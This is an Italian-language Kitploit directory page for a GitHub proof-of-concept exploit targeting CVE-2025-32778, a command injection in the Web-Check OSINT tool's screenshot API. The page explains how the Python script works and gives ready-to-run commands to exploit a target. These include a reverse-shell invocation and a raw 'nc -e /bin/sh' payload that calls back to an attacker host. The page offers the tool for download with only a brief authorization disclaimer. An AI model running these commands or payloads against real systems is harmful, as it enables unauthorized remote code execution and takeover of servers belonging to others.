Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32778 — Exploit PoC per CVE-2025-32778: command injection nello strumento OSINT Web-Check | Kitploit
Strumenti/GitHubGitHub/00xcanelo/cve-2025-32778
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

Exploit PoC per CVE-2025-32778: command injection nello strumento OSINT Web-Check

Vedi Repository
31491 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32778 - Exploit di Iniezione di Comandi in Web-Check

Critical Language: Python

Descrizione

CVE-2025-32778 è una vulnerabilità critica di iniezione di comandi nello strumento OSINT Web-Check di Lissy93.
Consente a un aggressore non autenticato di eseguire comandi di sistema arbitrari tramite il parametro url nell'API degli screenshot.

Questo script Python automatizza lo sfruttamento e può generare reverse shell o accettare payload shell personalizzati.


Avvertenza

  • Testa solo su sistemi di tua proprietà o per cui sei autorizzato.
  • L'uso non autorizzato è illegale e non etico.

Caratteristiche

  • Sfrutta l'iniezione di comandi url in Web-Check.
  • Supporta:
    • Reverse shell con --lhost e --lport.
    • Shell personalizzata tramite --shell.
  • Normalizzazione dell'URL.
  • Impedisce la combinazione di --shell con --lhost/--lport.

  • Requisiti

    • Python 3.x
    • Libreria Requests:
    root@kitploit:~
    pip install requests
    

    Utilizzo

    root@kitploit:~
    git clone https://github.com/00xCanelo/CVE-2025-32778
    cd CVE-2025-32778
    

    Crea una reverse shell con lo strumento

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
    

    Payload shell personalizzato (grezzo)

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
    

    Menu di aiuto

    root@kitploit:~
    python3 cve-2025-32778.py -h
    

    Come Funziona

    1. Normalizza l'URL target in scheme://host[:port].

    2. Prepara il payload:

      • Genera una reverse shell usando --lhost e --lport.
      • Oppure usa un comando shell grezzo con --shell.
    3. Codifica il payload della shell per un'iniezione URL sicura.

    4. Invia una richiesta HTTP GET a /api/screenshot/ con il payload.

    5. Attendi la connessione della reverse shell.


    🧑‍💻 Autore

    00xCanelo
    Profilo GitHub


    Riferimenti

    • Repository GitHub di Web-Check – Progetto originale contenente il codice vulnerabile.
    • CVE-2025-32778 – Voce CVE che descrive la vulnerabilità di iniezione di comandi.
    Scarica lo strumento